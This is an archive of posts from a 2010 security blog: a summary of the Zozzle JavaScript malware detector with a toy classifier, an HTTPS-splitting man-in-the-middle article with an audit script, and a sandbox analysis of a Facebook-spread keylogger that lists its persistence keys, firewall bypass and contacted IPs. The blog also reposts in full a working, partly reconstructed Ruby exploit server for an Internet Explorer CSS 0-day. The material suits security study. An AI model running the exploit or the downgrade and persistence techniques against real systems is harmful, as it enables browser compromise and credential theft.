## Wednesday, December 29, 2010

### Traveling Time Again.

Next month (almost all of January) I will be traveling around the US between conferences and business meetings. I will fly to New York; after a few days I'll be in Koloa (Kauai), Los Angeles, Las Vegas and then back to Sac, my second home ;).

For this reason it will be difficult to keep my blog updated while I am traveling. I'll do my best, but please be patient if you don't see weekly updates ... Unfortunately I will have only a few (very busy) days in each of these places, so I cannot organize meetings in California as we did last year with the SF and SD readers.

This is my last post of the year. Let me say:

*UPDATE-1*
Today is my last day in New York City. Everything was perfect; thanks to all the friends who joined me during the past evenings and to everyone who showed me around the city.

### Zozzle: Microsoft's Answer to JavaScript Malware.

Hi folks,
today I came across an interesting paper entitled Zozzle: Low-overhead Mostly Static JavaScript Malware Detection. It comes from Microsoft Research and looks like a very promising, mostly static JavaScript malware detector. It is meant to run in the background, checking whether the page being browsed contains traces of JavaScript malware.

Abstract:
JavaScript malware-based attacks account for a large fraction of successful mass-scale exploitation happening today. From the standpoint of the attacker, the attraction is that these drive-by attacks can be mounted against an unsuspecting user visiting a seemingly innocent webpage. While several techniques for addressing these types of exploits have been proposed, in-browser adoption has been slow, in part because of the performance overhead these methods tend to incur.

In this paper, we propose ZOZZLE, a low-overhead solution for detecting and preventing JavaScript malware that can be deployed in the browser. Our approach uses Bayesian classification of hierarchical features of the JavaScript abstract syntax tree to identify syntax elements that are highly predictive of malware. Our extensive experimental evaluation shows that ZOZZLE is able to effectively detect JavaScript malware through mostly static code analysis with very low false positive rates (fractions of 1%), and with a typical overhead of only 2-5 milliseconds per JavaScript file. Our experience also suggests that ZOZZLE may be used as a lightweight filter for a more costly detection technique or for standalone offline malware detection.

Some interesting results:

Figure: discovering more exploit samples over time. The x axis shows the number of examined malware samples, the y axis the number of unique ones.

Figure: transience of detected malicious URLs after several days. The number of days is shown on the x axis, the percentage of remaining malware on the y axis.

Even if this study is based on preliminary results, and even if in real life analyzing JavaScript dynamically can be time- and resource-consuming, I think the results they got are very interesting and worth following. To learn more about Zozzle please read the full paper.
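As an added example (it is not code from the paper or from Microsoft), here is a toy version of the approach the abstract describes: extract (context, text) features from JavaScript, train a naive Bayes classifier on labelled samples, and list the features most predictive of malware. The training snippets are constructed for this post. Real Zozzle works on the AST of code captured when it reaches eval or document.write; this token-based stand-in approximates the hierarchical context with a brace stack and uses a likelihood ratio in place of its chi-squared feature selection.

```python
import math
import re
from collections import Counter, defaultdict

TOKEN_RE = re.compile(
    r'"(?:[^"\\]|\\.)*"'          # double-quoted string literal
    r"|'(?:[^'\\]|\\.)*'"         # single-quoted string literal
    r"|[A-Za-z_$][A-Za-z0-9_$]*"  # identifier or keyword
    r"|0[xX][0-9a-fA-F]+|\d+"     # number: matched so 0x10000 is not read as x10000, then skipped
    r"|[{}]"                      # block delimiters
)
# Keywords that open a block; the block becomes the context of everything inside it.
BLOCK_KEYWORDS = {"function", "for", "while", "do", "if", "else", "try", "catch"}


def extract_features(js):
    """Set of (context, text) pairs for a JavaScript snippet.

    Zozzle pairs each AST node's text with the kind of node containing it
    (loop, function, try, string ...). This stand-in approximates that with a
    brace stack: the context is the keyword that opened the innermost block.
    Braceless control statements are mis-scoped; enough to show the idea."""
    stack, opener, features = ["program"], None, set()
    for tok in TOKEN_RE.findall(js):
        if tok == "{":
            stack.append(opener or stack[-1])
            opener = None
        elif tok == "}":
            if len(stack) > 1:
                stack.pop()
        elif tok in BLOCK_KEYWORDS:
            opener = tok                 # waits for its "{"
        elif tok[0] in "\"'":
            features.add(("string", tok[1:-1]))
        elif not tok[0].isdigit():
            features.add((stack[-1], tok))
    return features


class NaiveBayes:
    """Laplace-smoothed multinomial naive Bayes over per-sample feature sets."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.docs = Counter()               # label -> training samples
        self.counts = defaultdict(Counter)  # label -> feature -> samples containing it
        self.vocab = set()

    def train(self, samples):
        for js, label in samples:
            feats = extract_features(js)
            self.docs[label] += 1
            self.counts[label].update(feats)
            self.vocab.update(feats)

    def scores(self, js):
        feats, total, out = extract_features(js), sum(self.docs.values()), {}
        for label, n in self.docs.items():
            denom = sum(self.counts[label].values()) + self.alpha * len(self.vocab)
            out[label] = math.log(n / total) + sum(
                math.log((self.counts[label][f] + self.alpha) / denom) for f in feats)
        return out

    def classify(self, js):
        s = self.scores(js)
        return max(s, key=s.get)

    def predictive_features(self, label, k=5):
        """Features most over-represented in `label`: a likelihood-ratio stand-in
        for the chi-squared selection Zozzle uses to pick predictive syntax."""
        others = Counter()
        for lab, c in self.counts.items():
            if lab != label:
                others.update(c)
        ratio = {f: (self.counts[label][f] + self.alpha) / (others[f] + self.alpha)
                 for f in self.vocab}
        return sorted(ratio, key=ratio.get, reverse=True)[:k]


# Constructed training snippets, not real samples: heap-spray style code vs. page scripts.
TRAINING = [
    ('var shellcode = unescape("%u9090%u9090%uc0c0"); var spray = ""; '
     'for (var i = 0; i < 1000; i++) { spray += shellcode; } eval(spray);', "malicious"),
    ('function heap() { var nop = unescape("%u0c0c%u0c0c"); while (nop.length < 0x40000) { nop += nop; } '
     'var m = new Array(); for (var j = 0; j < 200; j++) { m[j] = nop + shellcode; } } heap();', "malicious"),
    ('try { var o = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) {} '
     'var x = unescape("%u4141%u4141"); eval(x);', "malicious"),
    ('function total(items) { var sum = 0; for (var i = 0; i < items.length; i++) '
     '{ sum += items[i].price; } return sum; }', "benign"),
    ('var form = document.getElementById("login"); form.addEventListener("submit", '
     'function (ev) { if (!form.user.value) { ev.preventDefault(); } });', "benign"),
    ('function render(list) { var out = ""; for (var i = 0; i < list.length; i++) '
     '{ out += "<li>" + list[i] + "</li>"; } document.getElementById("menu").innerHTML = out; }', "benign"),
]
SUSPECT_MALICIOUS = 'var z = unescape("%u0c0c%u0c0c%u9090"); while (z.length < 0x10000) { z += z; } eval(z);'
SUSPECT_BENIGN = 'function greet(name) { var msg = "Hello " + name; if (name.length > 0) { document.title = msg; } return msg; }'


def train_demo():
    """Classifier trained on TRAINING; train_demo().classify(SUSPECT_MALICIOUS) -> 'malicious'."""
    nb = NaiveBayes()
    nb.train(TRAINING)
    return nb
```

With six training snippets the classifier already separates the two suspects, and `predictive_features("malicious")` surfaces `unescape` and `eval` at program level together with `shellcode` inside a loop body: the same kind of context-bound syntax the paper reports as highly predictive. The point of the context is visible in the data: `var` inside a function says nothing, `unescape` at top level next to `eval` says a lot.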

## Tuesday, December 28, 2010

### Splitting the HTTPS Stream to Attack Secure Web Connections

Folks,

IEEE Security & Privacy has published an article that my group and I wrote some months ago, titled Splitting the HTTPS Stream to Attack Secure Web Connections. You can find it here; check it out!

Abstract:
The HTTPS protocol is commonly adopted to secure connections to websites, both to guarantee the server's authenticity and to protect the privacy of transmitted data. However, the computational load associated with the protocol's key exchange and encryption/decryption activities isn't negligible. Many heavily trafficked websites must avoid using HTTPS for most of their pages, typically restricting its usage only to encrypting sensitive user data. This article illustrates how this common practice significantly reduces the possibility of detecting manipulations of the data stream by the client, thus exposing the user to potential man-in-the-middle attacks.
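The pattern the abstract describes, as an added example that is not part of the article: a page served over plain HTTP that points at HTTPS resources. The HTTP page has no integrity, so every HTTPS reference in it, the login form's action above all, is a promise the browser cannot verify and an on-path attacker can rewrite before TLS is ever negotiated. The checker below flags such references in a constructed sample page (the hostnames are made up), and `downgrade()` shows the one-line rewrite a man-in-the-middle performs on the unauthenticated stream.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class TargetCollector(HTMLParser):
    """Collect every URL the page hands to the browser: links, scripts, frames,
    stylesheets and form actions (noting whether the form has a password field)."""

    URL_ATTR = {"a": "href", "script": "src", "iframe": "src", "link": "href"}

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.targets = []          # (tag, absolute_url, has_password_field)
        self._form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._form = {"action": action, "password": False}
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._form["password"] = True
        elif tag in self.URL_ATTR and attrs.get(self.URL_ATTR[tag]):
            self.targets.append((tag, urljoin(self.page_url, attrs[self.URL_ATTR[tag]]), False))

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.targets.append(("form", self._form["action"], self._form["password"]))
            self._form = None


def audit_http_page(page_url, html):
    """Findings for a page served over plain HTTP. The page itself is
    unauthenticated, so an HTTPS target inside it is only a promise that an
    on-path attacker can rewrite before the browser opens TLS."""
    if urlsplit(page_url).scheme != "http":
        return []                  # an HTTPS page vouches for its own references
    parser = TargetCollector(page_url)
    parser.feed(html)
    parser.close()
    findings = []
    for tag, url, has_password in parser.targets:
        scheme = urlsplit(url).scheme
        if tag == "form" and has_password:
            if scheme == "https":
                findings.append(("high", f"password form on an HTTP page posts to {url}; the action is attacker-writable"))
            else:
                findings.append(("critical", f"password form posts credentials in clear to {url}"))
        elif scheme == "https":
            findings.append(("medium", f"<{tag}> on an HTTP page references {url}; it can be downgraded or replaced"))
        elif tag in ("script", "iframe"):
            findings.append(("high", f"<{tag}> loads active content over HTTP from {url}"))
    return findings


def downgrade(html):
    """The manipulation an HTTPS-splitting man-in-the-middle applies to the
    unauthenticated stream: drop the scheme so the client never starts TLS and
    the credentials travel in clear through the attacker."""
    return html.replace("https://", "http://")


# Constructed page (hostnames are made up): a shop that keeps its front page on
# HTTP and "protects" only the login by pointing the form at HTTPS.
SAMPLE_PAGE = """<html><body>
<a href="https://shop.example/account">My account</a>
<form method="post" action="https://shop.example/login">
  <input name="user"> <input type="password" name="pw"> <input type="submit" value="Log in">
</form>
<script src="http://cdn.example/widget.js"></script>
</body></html>"""

if __name__ == "__main__":
    for sev, msg in audit_http_page("http://shop.example/", SAMPLE_PAGE):
        print(sev, msg)
    print("after the MITM rewrite:")
    for sev, msg in audit_http_page("http://shop.example/", downgrade(SAMPLE_PAGE)):
        print(sev, msg)
```

Run against the sample, the audit flags the account link, the login form and the plain-HTTP script; after `downgrade()` the same form is reported as posting credentials in clear, and nothing on the page lets the client notice the change, which is the article's point. The same audit run on the page fetched over HTTPS returns nothing, because there the references are covered by the connection's own integrity.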

## Thursday, December 23, 2010

### Internet Explorer CSS 0-Day: Exploit Released.

Hi folks,
yes, the new Internet Explorer (on Windows 7) 0-day makes it into my notes too. It's a nice piece of work.

What astonished me is that the exploit was released before the Microsoft patch.
Here is the exploit:

```ruby
#!/usr/bin/env ruby

# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
#
# Minimal web server that serves an HTML page plus a UTF-16 encoded CSS file
# whose name is itself a UTF-16 string and which @imports itself four times;
# the recursive import is what triggers the IE bug. The HTML and index bodies
# were lost when this post was extracted (the tags were stripped) and are
# reconstructed below from what the rest of the script requires of them.

require 'socket'

def http_send(sock, data, opts={})
  defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
  opts = defaults.merge(opts)

  code = opts[:code]
  message = opts[:message]
  type = opts[:type]

  headers = "HTTP/1.1 #{code} #{message}\r\n" +
    "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
    "Cache-Control: no-cache\r\n" +
    "Content-Type: #{type}\r\n" +
    "Pragma: no-cache\r\n" +
    "Content-Length: #{data.bytesize}\r\n\r\n"   # bytes, not characters: the body is UTF-16
  to_send = headers.b + data.b
  puts "[+] Sending:"
  to_send.split("\n").each do |line|
    puts "    #{line}"
  end
  sock.write(to_send) rescue return false
  return true
end

# Read one request from the client into out_str, giving up after timeout seconds.
# (The def line was missing from the extracted post; restored from the call below.)
def sock_read(sock, out_str, timeout)
  begin
    if Kernel.select([sock],[],[],timeout)
      out_str.replace(sock.recv(1024))
      out_str.split("\n").each do |line|
        puts "    #{line}"
      end
    else
      sock.close
      return false
    end
  rescue Exception => ex
    return false
  end
end

# Encode an ASCII string as UTF-16BE bytes (a NUL before every byte).
def to_uni(str)
  res = "".b
  str.each_byte do |b|
    res << "\x00".b << b.chr
  end
  res
end

@css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"
@html_name = "test.html"
placeholder = "a" * (@css_name.length/2)

# Page that pulls in the crafted stylesheet. Body reconstructed: only the
# placeholder reference (swapped for @css_name below) is required.
@html = <<-HTML
<html>
<head>
<link href="#{placeholder}" rel="stylesheet" type="text/css" />
</head>
<body>
</body>
</html>
HTML
@html = "\xfe\xff".b + to_uni(@html)
@html.gsub!(to_uni(placeholder), @css_name)

@css = <<-CSS
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
CSS
@css = "\xfe\xff".b + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)

# Landing page linking to the test page (link markup reconstructed, see above).
@index = <<-INDEX
<a href="#{@html_name}">#{@html_name}</a>
INDEX

TCPServer.open(55555) do |srv|
  while true
    cli = srv.accept
    req = ""
    next unless sock_read(cli, req, 5)
    while req.length > 0
      if req =~ /GET/
        if req =~ /GET.*#{Regexp.escape(@html_name)}/
          break unless http_send(cli, @html, :type=>"text/html")
        elsif req =~ /GET.*index/
          break unless http_send(cli, @index)
        elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
          break unless http_send(cli, @css, :type=>"text/css")
        else
          break unless http_send(cli, @css, :type=>"text/css")
        end
      elsif req =~ /QUIT/
        exit()
      end
      req = ""
    end
    cli.close rescue next
  end
end
```

Which basically implements a server that sends the following page back to clients:

It's really good work, but couldn't the release have waited for the patch?
I still have to suggest switching from IE to Safari, or to Firefox without third-party plugins.

## Wednesday, December 22, 2010

### Working Capital Tour

My first and probably last pitch session. Working Capital Tour, Rome 2010.

Why use pitch sessions? Because whoever listens to you cannot stay focused for more than 5 minutes..... poor guy.... why don't you try to improve your mental abilities before trying to listen to somebody? ;)

## Monday, December 20, 2010

Thanks to the CeSeNA group and to Luca Mella (one of the CeSeNA organizers), I came across a nice (in the sense of "didactic") example of malware, a keylogger, which shows how attackers can use social networks to spread a new generation of malware.

Everything starts with a friend who sends you a link. In this case the link was: http://www.facebook.com/l.php?u=www.acoplasticos.org%2Fcrm. Opening the link, a nice trap asks you to click on a "button", which runs a fake image: an executable file called image96523489.exe.

If the victim clicks on it, two processes start: the current browser, pointed at an innocuous page (a MySpace browse page, per the report below), and a background program called nvsvc32.exe, which is the actual malware.

The first action performed is to copy itself into the Windows directory as nvsvc32.exe, together with two other files, all created hidden: C:\windows\nvsvc32.exe, C:\windows\wibrf.jpg and C:\windows\wiybr.png.

It adds autostart registry entries: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA driver monitor = c:\windows\nvsvc32.exe, the same value under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run, and it sets HKLM\System\CurrentControlSet\Services\wuauserv\Start = 4 (SERVICE_DISABLED: Windows Update is switched off), plus other secondary locations.
It also changes Internet Explorer entries such as HKCU\Software\Microsoft\Internet Explorer\Main and HKCU\Software\Microsoft\Internet Explorer\Toolbar\Locked = 1, and adds the same autostart value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA driver monitor = c:\windows\nvsvc32.exe.

Some DNS queries:

Query DNS: astro.ic.ac.uk
Query DNS: ale.pakibili.com
Query DNS: versatek.com
Query DNS: journalofaccountancy.com
Query DNS: transnationale.org
Query DNS: browseusers.myspace.com
Query DNS: mas.0730ip.com
Query DNS: www.myspace.com
Query DNS: ds.phoenix-cc.net
Query DNS: stayontime.info
Query DNS: www.shearman.com
Query DNS: insidehighered.com
Query DNS: ate.lacoctelera.net
Query DNS: websitetrafficspy.com
Query DNS: qun.51.com
Query DNS: x.myspacecdn.com
Query DNS: summer-uni-sw.eesp.ch
Query DNS: shopstyle.com
Query DNS: xxx.stopklatka.pl
Query DNS: xxx.stopklatka.pl.localdomain

And of course network connections:

Connects to "63.135.80.224" on port 80 (TCP - HTTP).
Connects to "63.135.80.46" on port 80 (TCP - HTTP).
Connects to "46.40.191.11" on port 80 (TCP - HTTP).
Connects to "66.220.158.18" on port 80 (TCP - HTTP).
Connects to "174.37.200.82" on port 80 (TCP - HTTP).

From those addresses the malware downloads its actual core (the payload), copying it into different processes and folders on the victim machine. But this is not really interesting.

Connects to "205.234.253.15" on port 1234 (TCP).
This connection is much more interesting. Opening it with a normal web browser shows that it is not HTTP.

Analyzing the traffic and querying the DNS authority, the protocol in use turns out to be FTP.

This is a classic example of how social media can be used to spread malware. First the attacker sends you a friend request ... most of the time, if a nice girl or a good-looking man whom you might have met somewhere, but do not remember at all, asks for your friendship, you accept. Probably out of kindness, or to be sure not to look like an asshole. Second, once the attacker is inside your circle of friends, he waits some time to let the friendship settle. After a while he sends you a link, through a private message, a post on your wall or a news-feed item. You do not remember who he is, but since he is in your friend list you trust him. Here comes the real trick. You did not remember him when he sent the request, and if he had sent you a link right away you probably would not have trusted him. But after some time you forget that you did not trust him. So you trust him, because you assume that whoever is in your friend network is a friend and therefore trusted. You open the link and you get infected.

Yes, a keylogging operation is complicated. You need to compromise several websites to host the payload and the malware, you need to compromise an FTP server, you need to write a good payload that antivirus does not detect, you need to push and spread everything around the world.. I mean, it's a job! But all that technology pales compared to social engineering. Most of the time social engineering is the attacker's most powerful weapon. Protecting against it means protecting against most of this complicated, crazy attack technology.

Below is a detailed report on the malware:

[ General information ]
* File name: c:\documents and settings\administrator\desktop\image96523489.exe
* File length: 65024 bytes
* File signature: Microsoft Visual C++ 7.0
* MD5 hash: 085ecb8b600c3b4b105674ed27cdcbaf
* SHA1 hash: 5c20fe20a5f0a86d1b0455f8d20299dfe583b30b
* SHA256 hash: f2a17d30d9e921fdc9e0d7f927f20c8820869552d8ba1cfa5f7fbc68d64f970a

[ Changes to filesystem ]
* Creates file C:\windows\ndl.dl
* Creates file (hidden) C:\windows\nvsvc32.exe
* Creates file (hidden) C:\windows\wibrf.jpg
* Creates file (hidden) C:\windows\wiybr.png
* Creates file C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012010121320101220\index.dat
* Creates file C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012010122020101221\index.dat
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F7YBJYVW\bg_browserSection[1].jpg
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F7YBJYVW\browserunsupported[1].htm
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JRQBGGX3\icon_information[1].gif
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JRQBGGX3\index[4].htm
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LPI195Q5\bg_infobox[1].jpg
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LPI195Q5\browserLogos_med[1].jpg

[ Changes to registry ]
* Creates value "FileTracingMask=0000FFFF" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "ConsoleTracingMask=0000FFFF" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "MaxFileSize=00001000" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "FileDirectory=2500770069006E0064006900720025005C00740072006100630069006E0067000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
* Creates value "LogSessionName=7300740064006F00750074000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "Active=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "ControlFlags=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "BitNames= NAP_TRACE_BASE NAP_TRACE_NETSH" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr
* Creates value "LogSessionName=7300740064006F00750074000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "Active=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "ControlFlags=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "Guid=b0278a28-76f1-4e15-b1df-14b209a12613" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
* Creates value "BitNames= Error Unusual Info Debug" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
* Creates Registry key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\napagent\LocalConfig\Enroll\HcsGroups
* Creates Registry key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\napagent\LocalConfig\UI
* Creates value "image96523489.exe=c:\windows\nvsvc32.exe:*:Enabled:NVIDIA driver monitor" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrator\Desktop
* Modifies value "Start=00000004" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\wuauserv
old value "Start=00000002"
* Modifies value "Window_Placement=2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF62000000920000005903000041030000" in key HKEY_CURRENT_USER\software\Microsoft\Internet Explorer\Main
old value "Window_Placement=2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFA00000000000000097030000AF020000"
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
* Modifies value "HRZR_PGYFRFFVBA=10015D0E14000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count
old value "HRZR_PGYFRFFVBA=FDED5C0E13000000"
* Modifies value "Count=00000010" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Count=0000000F"
* Modifies value "Time=DA070C000100140008002A0022006C00" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Time=DA070C0005001100070037003000A802"
* Modifies value "Count=00000010" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Count=0000000F"
* Modifies value "Time=DA070C000100140008002A0022007C00" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Time=DA070C0005001100070037003000A802"
* Creates value "CachePath=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310030003100320031003300320030003100300031003200320030005C000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CachePrefix=:2010121320101220: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CacheLimit=00200000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CacheOptions=0B000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121420101215
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121620101217
* Creates value "CachePath=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310030003100320032003000320030003100300031003200320031005C000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CachePrefix=:2010122020101221: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CacheLimit=00200000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CacheOptions=0B000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Modifies value "SavedLegacySettings=3C00000020000000010000000000000000000000000000000400000000000000A0C4FAAF62D0CA0101000000AC10268B0000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "SavedLegacySettings=3C0000001E000000010000000000000000000000000000000400000000000000A0C4FAAF62D0CA0101000000AC10268B0000000000000000"
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
* Modifies value "MRUListEx=02000000010000000800000016000000170000000F0000000D0000001500000014000000130000001200000010000000110000000300000000000000050000000E0000000C0000000B0000000A00000009000000070000000600000004000000FFFFFFFF" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\BagMRU
old value "MRUListEx=01000000020000000800000016000000170000000F0000000D0000001500000014000000130000001200000010000000110000000300000000000000050000000E0000000C0000000B0000000A00000009000000070000000600000004000000FFFFFFFF"
* Modifies value "WinPos1286x734(1).left=00000062" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).left=000000A0"
* Modifies value "WinPos1286x734(1).top=00000092" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value empty
* Modifies value "WinPos1286x734(1).right=00000359" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).right=00000397"
* Modifies value "WinPos1286x734(1).bottom=00000341" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).bottom=000002AF"
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Network services ]
* Looks for an Internet connection.
* Backdoor functionality on port 0.
* Queries DNS astro.ic.ac.uk
* Queries DNS ale.pakibili.com
* Queries DNS versatek.com
* Queries DNS journalofaccountancy.com
* Queries DNS transnationale.org
* Queries DNS browseusers.myspace.com
* Queries DNS mas.0730ip.com
* Queries DNS www.myspace.com
* Queries DNS ds.phoenix-cc.net
* Queries DNS stayontime.info
* Queries DNS www.shearman.com
* Queries DNS insidehighered.com
* Queries DNS ate.lacoctelera.net
* Queries DNS websitetrafficspy.com
* Queries DNS qun.51.com
* Queries DNS x.myspacecdn.com
* Queries DNS summer-uni-sw.eesp.ch
* Queries DNS shopstyle.com
* Queries DNS xxx.stopklatka.pl
* Queries DNS xxx.stopklatka.pl.localdomain
* Connects to "63.135.80.224" on port 80 (TCP - HTTP).
* Connects to "63.135.80.46" on port 80 (TCP - HTTP).
* Connects to "205.234.253.15" on port 1234 (TCP).
* Connects to "46.40.191.11" on port 80 (TCP - HTTP).
* Connects to "66.220.158.18" on port 80 (TCP - HTTP).
* Connects to "174.37.200.82" on port 80 (TCP - HTTP).
* Opens next URLs:
http://174.37.200.82/index.php

[ Process/window information ]
* Keylogger functionality.
* Creates process "(null),net stop ,(null)".
* Injects code into process "net.exe".
* Creates a mutex "SHIMLIB_LOG_MUTEX".
* Creates an event named "DINPUTWINMM".
* Creates an event named "Global\userenv: User Profile setup event".
* Creates process "(null),net1 stop ,(null)".
* Injects code into process "net1.exe".
* Creates process "(null),C:\Documents and Settings\Administrator\Desktop\image96523489.exe,(null)".
* Injects code into process "image96523489.exe".
* Creates an event named "Global\crypt32LogoffEvent".
* Creates a mutex "Nvidia Drive Mon".
* Creates a mutex "_!MSFTHISTORY!_".
* Creates a mutex "c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!".
* Creates process "(null),netsh firewall add allowedprogram 1.exe 1 ENABLE,(null)".
* Creates process "c:\windows\nvsvc32.exe,(null),c:\windows".
* Creates process "(null),explorer.exe http://browseusers.myspace.com/Browse/Browse.aspx,(null)".
* Injects code into process "explorer.exe".
* Opens a service named "ShellHWDetection".
* Creates process "(null),C:\windows\nvsvc32.exe,(null)".
